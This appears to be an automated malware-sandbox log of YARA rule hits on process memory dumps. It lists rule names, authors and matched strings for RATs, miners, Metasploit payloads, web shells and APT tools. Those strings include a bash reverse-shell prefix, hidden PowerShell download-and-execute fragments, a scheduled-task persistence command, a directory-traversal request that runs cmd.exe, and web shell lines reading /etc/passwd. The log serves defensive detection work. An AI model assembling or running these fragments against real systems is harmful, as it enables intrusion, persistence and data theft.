00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp	MAL_unspecified_Jan18_1	Detects unspecified malware sample	Florian Roth	0x1dd71:$s1: User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko 0x1ddc6:$s2: ping 192.0.2.2 -n 1 -w %d >nul 2>&1 0x1ddee:$s3: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d] 0x1de20:$s4: start /b "" cmd /c del "%%~f0"&exit /b 0x1de4b:$s5: [%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d] 0x1de74:$s6: %s\%s.bat 0x1de82:$s7: DEL /s "%s" >nul 2>&1
00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp	Invoke_PSImage	Detects a command to execute PowerShell from String	Florian Roth	0x207f2:$: IEX([System.Text.Encoding]::ASCII.GetString( 0x20821:$: System.Drawing.Bitmap((a Net.WebClient).OpenRead( 0x20855:$: 89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52 00 00 04 E4 00 00 03 A0 08 06 00 00 00 9D AF A9 ...
00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp	malware_apt15_royaldll	DLL implant, originally rights.dll and runs as a service	David Cannings	0x1488f:$: Nwsapagent 0x1487a:$: "%s">>"%s"\s.txt 0x1483a:$: del c:\windows\temp\r.exe /f /q
00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp	JoeSecurity_WebMonitor	Yara detected WebMonitor RAT	Joe Security
00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp	JoeSecurity_MiniRAT	Yara detected Mini RAT	Joe Security
00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp	JoeSecurity_ComRAT_XORKey	Yara detected Turla ComRAT XORKey	Joe Security
00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp	netwire	detect netwire in memory	JPCERT/CC Incident Response Group	0x1ddc6:$ping: ping 192.0.2.2 0x1ddee:$log: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
0000000A.00000003.325067585.0000000002E7E000.00000004.00000001.sdmp	scanarator	Auto-generated rule on file scanarator.exe	yarGen Yara Rule Generator by Florian Roth	0xf78:$s4: GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
00000013.00000003.471467850.00000000051F3000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x580:$a: Amplia Security
00000013.00000003.471467850.00000000051F3000.00000004.00000001.sdmp	Fierce2	This signature detects the Fierce2 domain scanner	Florian Roth	0x398:$s1: $tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,
00000013.00000003.471467850.00000000051F3000.00000004.00000001.sdmp	webshell_Shell_ci_Biz_was_here_c100_v_xxx	Web Shell - from files Shell [ci	unknown	0x758:$s3: <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null" 0x1b8:$s7: <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/de
00000013.00000003.471467850.00000000051F3000.00000004.00000001.sdmp	Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php	Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x439:$s0: Safe0ver
00000013.00000003.478269987.0000000002FAD000.00000004.00000001.sdmp	scanarator	Auto-generated rule on file scanarator.exe	yarGen Yara Rule Generator by Florian Roth	0x1f78:$s4: GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
00000013.00000003.435493556.0000000006B8B000.00000004.00000001.sdmp	webshell_PHP_b37	Web Shell - file b37.php	Florian Roth	0x10220:$s0: xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc
00000013.00000003.435493556.0000000006B8B000.00000004.00000001.sdmp	Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php	Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x71db:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp	Volgmer_Malware	Detects Volgmer malware as reported in US CERT TA17-318B	Florian Roth	0x1bfc2:$x1: User-Agent: Mozillar/5.0 0x1c002:$x3: [TestConnect To Bot] - Port = %d 0x1c027:$x4: b50a338264226b6d57c1936d9db140ba74a28930270a083353645a9b518661f4fcea160d7 0x1c08a:$s2: H_%s_%016I64X_%04d%02d%02d%02d%02d%02d.TXT 0x1c0d5:$s4: %s\dllcache\%s.dll 0x1c0ec:$s5: Cond Fail. 0x1c0fb:$s6: The %s %s%s 0x1c10b:$s7: %s "%s"%s "%s" %s "%s" 0x1c126:$s8: DLL_Spider.dll
0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp	RemCom_RemoteCommandExecution	Detects strings from RemCom tool	Florian Roth	0x17e2c:$: \\.\pipe\%s%s%d 0x17e3e:$: %s\pipe\%s%s%d%s 0x17e51:$: \ADMIN$\System32\%s%s
0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp	ProcessInjector_Gen	Detects a process injection utility that can be used ofr good and bad purposes	Florian Roth	0x9fd0:$x1: Error injecting remote thread in process: 0x9ffe:$s5: [-] Error getting access to process: %ld! 0xa02c:$s6: --process-name <name> Process name to inject 0xa05f:$s12: No injection target has been provided! 0xa08b:$s17: [-] An app path is required when not injecting!
0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp	Lazagne_PW_Dumper	Detects Lazagne PW Dumper	Markus Neis / Florian Roth	0xc510:$s1: Crypto.Hash 0xc520:$s2: laZagne 0xc52c:$s3: impacket.winregistry
0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp	SUSP_shellpop_Bash	Detects susupicious bash command	Tobias Michalski	0x5e91:$: /bin/bash -i >& /dev/tcp/
0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp	GoldDragon_Aux_File	Detects export from Gold Dragon - February 2018	Florian Roth	0x145ff:$x1: /////////////////////regkeyenum//////////// 0x148ac:$x1: /////////////////////regkeyenum////////////
0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp	VBS_dropper_script_Dec17_1	Detects a supicious VBS script that drops an executable	Florian Roth	0x17c7d:$s1: TVpTAQEAAAAEAA 0x17c90:$s2: TVoAAAAAAAAAAA 0x17ca3:$s3: TVqAAAEAAAAEAB 0x17cb6:$s4: TVpQAAIAAAAEAA 0x17cc9:$s5: TVqQAAMAAAAEAA 0x1b3c6:$s5: TVqQAAMAAAAEAA 0x1d783:$s5: TVqQAAMAAAAEAA 0x17cdc:$a1: = CreateObject("Wscript.Shell")
0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp	Lazarus_Dec_17_5	Detects Lazarus malware from incident in Dec 2017	Florian Roth	0x19484:$x1: $ProID = Start-Process powershell.exe -PassThru -WindowStyle Hidden -ArgumentList 0x194da:$x2: $respTxt = HttpRequestFunc_doprocess -szURI $szFullURL -szMethod $szMethod -contentData $contentData; 0x19544:$x3: [String]$PS_PATH = "C:\\Users\\Public\\Documents\\ProxyAutoUpdate.ps1"; 0x19590:$x4: $cmdSchedule = 'schtasks /create /tn "ProxyServerUpdater" 0x195ce:$x5: /tr "powershell.exe -ep bypass -windowstyle hidden -file 0x1960c:$x6: C:\\Users\\Public\\Documents\\tmp' + -join 0x1963c:$x7: $cmdResult = cmd.exe /c $cmdInst \| Out-String; 0x1966f:$x8: whoami /groups \| findstr /c:"S-1-5-32-544"
0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp	APT_Turla_Agent_BTZ_Gen_1	Detects Turla Agent.BTZ	Florian Roth	0x3a9a:$x1: 1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s 0xa82c:$x1: 1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s 0x3b00:$s1: release mutex - %u (%u)(%u) 0x3b20:$s2: \system32\win.com 0xa9af:$s2: \system32\win.com 0x3b36:$s3: Command Id:%u%010u(%02d:%02d:%02d %02d/%02d/%04d) 0x3b6c:$s4: MakeFile Error(%d) copy file to temp file %s 0x3b9d:$s5: %s%%s08x.tmp 0x3bae:$s6: Run instruction: %d ID:%u%010u(%02d:%02d:%02d %02d/%02d/%04d) 0x3bf0:$s7: Mutex_Log 0x3bfe:$s8: %s\system32\winview.ocx 0x3c49:$s10: Error: pos(%d) > CmdSize(%d) 0x3c6b:$s11: \win.com 0x3c79:$s12: Error(%d) run %s 0x3c90:$s13: %02d.%02d.%04d Log begin: 0xa991:$s13: %02d.%02d.%04d Log begin:
0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp	Suspicious_BAT_Strings	Detects a string also used in Netwire RAT auxilliary	Florian Roth	0x16dc6:$s1: ping 192.0.2.2 -n 1
0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp	Turla_Mal_Script_Jan18_1	Detects Turla malicious script	Florian Roth	0x16fe1:$s1: .charCodeAt(i % 0x16ff6:$s2: {WScript.Quit();} 0x1700c:$s3: .charAt(i)) << 10) \| 0x17025:$s4: = WScript.Arguments;var 0x17043:$s5: = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";var i;
0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp	VBS_Obfuscated_Mal_Feb18_1	Detects malicious obfuscated VBS observed in February 2018	Florian Roth	0x121c2:$x1: A( Array( (1* 2^1 )+ 0x121db:$x2: .addcode(A( Array( 0x121f2:$x3: false:AA.send:Execute(AA.responsetext):end 0x12221:$x4: & A( Array( (1* 2^1 )+ 0x1223d:$s1: .SYSTEMTYPE:NEXT:IF (UCASE( 0x1225d:$s2: A = STR:next:end function 0x1227b:$s3: &WSCRIPT.SCRIPTFULLNAME&CHR
0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp	LokiBot_Dropper_ScanCopyPDF_Feb18	Auto-generated rule - file Scan Copy.pdf.com	Florian Roth	0x116b5:$a1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB 0x118a1:$a1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB 0x11708:$s2: Unstalled2
0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x1a763:$sa1: -enc 0x1a7a0:$sb2: -window hidden 0x194b3:$sb3: -WindowStyle Hidden 0x195ec:$sb3: -windowstyle hidden 0x5bcc:$sc1: -nop 0x5bd1:$se1: -ep bypass 0x195e1:$se1: -ep bypass 0x1a756:$se2: -exec bypass 0x1a793:$se2: -exec bypass 0x13c36:$se3: -ExecutionPolicy Bypass 0x1a756:$se4: -exec bypass 0x1a793:$se4: -exec bypass
0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp	Armitage_msfconsole	Detects Armitage component	Florian Roth	0x18b30:$s1: \umeterpreter\u > 0x18b46:$s3: ^meterpreter > 0x18b5a:$s11: \umsf\u>
0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp	Armitage_OSX	Detects Armitage component	Florian Roth	0x18c7a:$x1: resources/covertvpn-injector.exe 0x18ca0:$s10: resources/browserpivot.x64.dll 0x18cc4:$s17: resources/msfrpcd_new.bat
0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp	Silence_malware_2	Detects malware sample mentioned in the Silence report on Securelist	Florian Roth	0x1dc3a:$x1: \ScreenMonitorService\Release\smmsrv.pdb 0x1dc67:$x2: \\.\pipe\{73F7975A-A4A2-4AB6-9121-AECAE68AABBB} 0x1dc9b:$s1: My Sample Service: ServiceMain: SetServiceStatus returned error 0x1dcdf:$s2: \mss.exe 0x1dcec:$s3: \out.dat 0x1dcf9:$s4: \mss.txt 0x1dd06:$s5: Default monitor
0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp	Invoke_Mimikatz	Detects Invoke-Mimikatz String	Florian Roth	0x1d798:$x3: Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp
0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1752c:$s1: stratum+tcp:// 0x1753f:$s2: "normalHashing": true,
0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp	MAL_unspecified_Jan18_1	Detects unspecified malware sample	Florian Roth	0x16d71:$s1: User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko 0x16dc6:$s2: ping 192.0.2.2 -n 1 -w %d >nul 2>&1 0x16dee:$s3: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d] 0x16e20:$s4: start /b "" cmd /c del "%%~f0"&exit /b 0x16e4b:$s5: [%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d] 0x16e74:$s6: %s\%s.bat 0x16e82:$s7: DEL /s "%s" >nul 2>&1
0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp	Invoke_PSImage	Detects a command to execute PowerShell from String	Florian Roth	0x197f2:$: IEX([System.Text.Encoding]::ASCII.GetString( 0x19821:$: System.Drawing.Bitmap((a Net.WebClient).OpenRead( 0x19855:$: 89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52 00 00 04 E4 00 00 03 A0 08 06 00 00 00 9D AF A9 ...
0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp	malware_apt15_royaldll	DLL implant, originally rights.dll and runs as a service	David Cannings	0xd88f:$: Nwsapagent 0xd87a:$: "%s">>"%s"\s.txt 0xd83a:$: del c:\windows\temp\r.exe /f /q
0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp	JoeSecurity_WebMonitor	Yara detected WebMonitor RAT	Joe Security
0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp	JoeSecurity_MiniRAT	Yara detected Mini RAT	Joe Security
0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp	JoeSecurity_ComRAT_XORKey	Yara detected Turla ComRAT XORKey	Joe Security
0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp	netwire	detect netwire in memory	JPCERT/CC Incident Response Group	0x16dc6:$ping: ping 192.0.2.2 0x16dee:$log: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
00000013.00000003.417846471.0000000002FAC000.00000004.00000001.sdmp	scanarator	Auto-generated rule on file scanarator.exe	yarGen Yara Rule Generator by Florian Roth	0x2f78:$s4: GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
0000000A.00000003.318347743.00000000068C2000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x281d0:$a: Amplia Security 0x28180:$c: getlsasrvaddr.exe 0x35140:$d: Cannot get PID of LSASS.EXE 0x352c0:$e: extract the TGT session key
0000000A.00000003.318347743.00000000068C2000.00000004.00000001.sdmp	SQLMap	This signature detects the SQLMap SQL injection tool	Florian Roth	0x396c8:$s1: except SqlmapBaseException, ex:
0000000A.00000003.318347743.00000000068C2000.00000004.00000001.sdmp	PortRacer	Auto-generated rule on file PortRacer.exe	yarGen Yara Rule Generator by Florian Roth	0x34d20:$s0: Auto Scroll BOTH Text Boxes 0x34f90:$s4: Start/Stop Portscanning 0x39348:$s6: Auto Save LogFile by pressing STOP
00000013.00000003.475887530.0000000006E3F000.00000004.00000001.sdmp	SQLMap	This signature detects the SQLMap SQL injection tool	Florian Roth	0x6f0:$s1: except SqlmapBaseException, ex:
0000000A.00000003.316560246.00000000068A5000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x451d0:$a: Amplia Security 0x45180:$c: getlsasrvaddr.exe 0x52140:$d: Cannot get PID of LSASS.EXE 0x522c0:$e: extract the TGT session key
0000000A.00000003.316560246.00000000068A5000.00000004.00000001.sdmp	SQLMap	This signature detects the SQLMap SQL injection tool	Florian Roth	0x566c8:$s1: except SqlmapBaseException, ex:
0000000A.00000003.316560246.00000000068A5000.00000004.00000001.sdmp	PortRacer	Auto-generated rule on file PortRacer.exe	yarGen Yara Rule Generator by Florian Roth	0x51d20:$s0: Auto Scroll BOTH Text Boxes 0x51f90:$s4: Start/Stop Portscanning 0x56348:$s6: Auto Save LogFile by pressing STOP
0000000A.00000003.313078570.000000000661F000.00000004.00000001.sdmp	FVEY_ShadowBroker_Auct_Dez16_Strings	String from the ShodowBroker Files Screenshots - Dec 2016	Florian Roth	0x7a7e:$s11: elatedmonkey 0x7656:$elf4: charm_saver 0x7f76:$elf8: ebbshave 0x7d96:$elf9: eggbasket 0x7a47:$elf17: ghost_sparc 0x7eae:$elf18: jackpop 0x9bae:$elf19: orleans_stride 0x976e:$elf21: seconddate 0x7656:$pe2: charm_saver 0x7a53:$pe3: ghost_x86
0000000A.00000003.313078570.000000000661F000.00000004.00000001.sdmp	webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit	Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php	Florian Roth	0x8e90:$s1: <option value="cat /etc/passwd">/etc/passwd</option>
0000000A.00000003.313078570.000000000661F000.00000004.00000001.sdmp	webshell_webshells_new_PHP1	Web shells - generated from file PHP1.php	Florian Roth	0x9430:$s3: @preg_replace("/f/e",$_GET['u'],"fengjiao");
0000000A.00000003.313078570.000000000661F000.00000004.00000001.sdmp	h4ntu_shell__powered_by_tsoi_	Semi-Auto-generated - file h4ntu shell [powered by tsoi	unknown	0x9249:$s0: h4ntu shell
0000000A.00000003.313078570.000000000661F000.00000004.00000001.sdmp	WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit	PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php	Florian Roth	0x8e90:$s13: <option value="cat /etc/passwd">/etc/passwd</option>
0000000A.00000003.308116996.0000000002E7C000.00000004.00000001.sdmp	scanarator	Auto-generated rule on file scanarator.exe	yarGen Yara Rule Generator by Florian Roth	0x2f78:$s4: GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
00000013.00000003.475715447.0000000006E30000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x1420:$e: extract the TGT session key
00000013.00000003.430903809.0000000006BA5000.00000004.00000001.sdmp	Hacktool_Strings_p0wnedShell	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs	Florian Roth	0x8818:$x5: p0wnedShellx64
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Msfpayloads_msf	Metasploit Payloads - file msf.sh	Florian Roth	0xb183e:$s1: export buf=\
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Msfpayloads_msf_psh	Metasploit Payloads - file msf-psh.vba	Florian Roth	0x55881:$s1: powershell.exe -nop -w hidden -e 0xb1d01:$s1: powershell.exe -nop -w hidden -e 0xb24ad:$s1: powershell.exe -nop -w hidden -e 0xb1d36:$s2: Call Shell( 0xb1d5f:$s3: Sub Workbook_Open()
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Msfpayloads_msf_exe	Metasploit Payloads - file msf-exe.vba	Florian Roth	0xb290f:$s1: '* PAYLOAD DATA 0xb293c:$s2: = Shell( 0xb2992:$s4: '************************************************************** 0xb29ef:$s5: ChDir ( 0xb2a14:$s6: '* MACRO CODE
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Msfpayloads_msf_3	Metasploit Payloads - file msf.psh	Florian Roth	0xb2c69:$s2: public enum MemoryProtection { ExecuteReadWrite = 0x40 } 0xb2cbf:$s3: .func]::VirtualAlloc(0, 0xb2ce6:$s4: .func+AllocationType]::Reserve -bOr [ 0xb2d20:$s5: New-Object System.CodeDom.Compiler.CompilerParameters 0xb2ddf:$s7: public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 } 0xb2e3d:$s8: .func]::CreateThread(0,0,$ 0xb2e75:$s9: public enum Time : uint { Infinite = 0xFFFFFFFF } 0xb2f03:$s11: { $global:result = 3; return }
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Msfpayloads_msf_4	Metasploit Payloads - file msf.aspx	Florian Roth	0xb310a:$s1: = VirtualAlloc(IntPtr.Zero,(UIntPtr) 0xb3143:$s2: .Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE); 0xb31da:$s4: private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40; 0xb3232:$s5: private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Msfpayloads_msf_cmd	Metasploit Payloads - file msf-cmd.ps1	Florian Roth	0xb248f:$x1: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Msfpayloads_msf_ref	Metasploit Payloads - file msf-ref.ps1	Florian Roth	0xb46e9:$s1: kernel32.dll WaitForSingleObject), 0xb47a9:$s3: GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object 0xb481f:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x5004e:$s5: = [System.Convert]::FromBase64String( 0xb2ec5:$s5: = [System.Convert]::FromBase64String( 0xb4872:$s5: = [System.Convert]::FromBase64String( 0xb48ac:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0xb48ff:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0x605fc:$s1: WS2_32.dll 0xcb626:$s1: WS2_32.dll 0x16a832:$s1: WS2_32.dll 0x5df7b:$s2: ReflectiveLoader 0x5e038:$s2: ReflectiveLoader 0x5e6ed:$s2: ReflectiveLoader 0x5e7d6:$s2: ReflectiveLoader 0x65187:$s2: ReflectiveLoader 0x6527e:$s2: ReflectiveLoader 0x661f3:$s2: ReflectiveLoader 0x66ab9:$s2: ReflectiveLoader 0x66f45:$s2: ReflectiveLoader
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	PowerShell_ISESteroids_Obfuscation	Detects PowerShell ISESteroids obfuscation	Florian Roth	0x72472:$x3: Catch { } 0x7249a:$x4: \_/=} ${_
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Payload_Exe2Hex	Detects payload generated by exe2hex	Florian Roth	0xfc2cc:$b1: set+%2Fp+%22%3D4d5 0xfc2f3:$b2: powershell+-Command+%22%24hex 0xfc325:$c1: echo 4d 5a 0xfc345:$c2: echo r cx >> 0xfc366:$d1: echo+4d+5a+ 0xfc386:$d2: echo+r+cx+%3E%3E
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Codoso_CustomTCP_4	Detects Codoso APT CustomTCP Malware	Florian Roth	0xf945f:$x1: varus_service_x86.dll 0xf9c66:$x1: varus_service_x86.dll 0xf9492:$s1: /s %s /p %d /st %d /rt %d 0xf9c99:$s1: /s %s /p %d /st %d /rt %d 0xf94c9:$s2: net start %%1 0xf9cd0:$s2: net start %%1 0xf94f4:$s3: ping 127.1 > nul 0xf9cfb:$s3: ping 127.1 > nul 0xf9522:$s4: McInitMISPAlertEx 0xf9d29:$s4: McInitMISPAlertEx 0xf9551:$s5: sc start %%1 0xf9d58:$s5: sc start %%1 0xf957b:$s6: net stop %%1 0xf9daa:$s6: net stop %%1 0xf95a5:$s7: WorkerRun 0xfa6a5:$s7: WorkerRun
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xfa2c2:$x1: cmd.exe /c ping 127.0.0.1 && ping 127.0.0.1 && sc start %s && ping 127.0.0.1 && sc start %s 0xfac18:$x1: cmd.exe /c ping 127.0.0.1 && ping 127.0.0.1 && sc start %s && ping 127.0.0.1 && sc start %s 0xfad5d:$s1: spideragent.exe 0xfad8a:$s2: AVGIDSAgent.exe 0xfadb7:$s3: kavsvc.exe 0xfaddf:$s4: mspaint.exe 0xfae08:$s5: kav.exe 0xfae2d:$s6: avp.exe 0xfae52:$s7: NAV.exe 0xfafa4:$c6: ConsentPromptBehaviorAdmin
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Codoso_PGV_PVID_1	Detects Codoso APT PGV PVID Malware	Florian Roth	0xfbe7b:$s1: TsWorkSpaces.dll 0xfbeea:$s3: /selfservice/microsites/search.php?%016I64d 0xfbf33:$s4: /solutions/company-size/smb/index.htm?%016I64d 0xfbfe7:$s7: {%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X} 0xfc037:$s8: WUServiceMain 0xfbe25:$s9: Cookie: pgv_pvid=
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	GhostDragon_Gh0stRAT	Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report	Florian Roth	0xf0e12:$x3: \xclolg2.tmp 0xf0e3c:$x4: Http/1.1 403 Forbidden 0xf1065:$x4: Http/1.1 403 Forbidden 0xf0e70:$x5: %sxsd%d.pif 0xf0ec3:$x7: %-23s %-16s 0x%x(%02d) 0xf0ef8:$x8: RegSetValueEx(start) 0xf0fa1:$s1: viewsc.dll 0xf0fc9:$s2: Proxy-Connection: Keep-Alive 0xf1006:$s3: \sfc_os.dll 0xa8e0b:$s4: Mozilla/4.0 (compatible) 0xf102f:$s4: Mozilla/4.0 (compatible) 0xf0e3c:$s5: Http/1.1 403 Forbidden 0xf1065:$s5: Http/1.1 403 Forbidden 0xf1099:$s6: CONNECT %s:%d HTTP/1.1 0xf10d1:$s7: WindowsUpperVersion 0xf1102:$s8: [%d-%d-%d %d:%d:%d] (%s) 0xf117a:$s10: %s sp%d(%d) 0xf11a4:$s11: OpenSC ERROR 0xf11d0:$s12: get rgspath error
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	GhostDragon_Gh0stRAT_Sample2	Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report	Florian Roth	0xf14d7:$x1: AdobeWpk 0xf14fd:$x2: seekin.dll 0x15174:$c1: Windows NT 6.1; Trident/6.0) 0xf1525:$c1: Windows NT 6.1; Trident/6.0) 0xf155f:$c2: Mozilla/5.0 (compatible; MSIE 10.0;
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	CoreImpact_sysdll_exe	Detects a malware sysdll.exe from the Rocket Kitten APT	Florian Roth	0xb75:$x1: Mozilla/5.0 0xc17f:$x1: Mozilla/5.0 0xf8f0:$x1: Mozilla/5.0 0x15150:$x1: Mozilla/5.0 0x1a90f:$x1: Mozilla/5.0 0x1f64b:$x1: Mozilla/5.0 0x22a23:$x1: Mozilla/5.0 0x22e0f:$x1: Mozilla/5.0 0x22e45:$x1: Mozilla/5.0 0x22ead:$x1: Mozilla/5.0 0x35f4b:$x1: Mozilla/5.0 0x368ab:$x1: Mozilla/5.0 0x38b07:$x1: Mozilla/5.0 0x3cfd4:$x1: Mozilla/5.0 0x45860:$x1: Mozilla/5.0 0x57c43:$x1: Mozilla/5.0 0x5aea0:$x1: Mozilla/5.0 0x6091f:$x1: Mozilla/5.0 0x6ab51:$x1: Mozilla/5.0 0x7a91d:$x1: Mozilla/5.0 0xb83e4:$x1: Mozilla/5.0
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Reflective_DLL_Loader_Aug17_1	Detects Reflective DLL Loader	Florian Roth	0x5df1b:$x2: reflective_dll.x64.dll 0x5df4f:$s3: DLL Injection 0x5df7a:$s4: ?ReflectiveLoader@@YA_KPEAX@Z 0x5e037:$s4: ?ReflectiveLoader@@YA_KPEAX@Z
00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Reflective_DLL_Loader_Aug17_2	Detects Reflective DLL Loader - suspicious - Possible FP could be program crack	Florian Roth	0x5e65c:$x1: \ReflectiveDLLInjection-master\ 0x5e691:$s2: reflective_dll.dll 0x5ea7e:$s2: reflective_dll.dll 0x5eaf4:$s2: reflective_dll.dll 0x5e6c1:$s3: DLL injection 0x197e72:$s3: DLL injection 0x5e6ec:$s4: _ReflectiveLoader@4 0x5e7d5:$s4: _ReflectiveLoader@4 0x66f44:$s4: _ReflectiveLoader@4 0x5e71d:$s5: Reflective Dll Injection
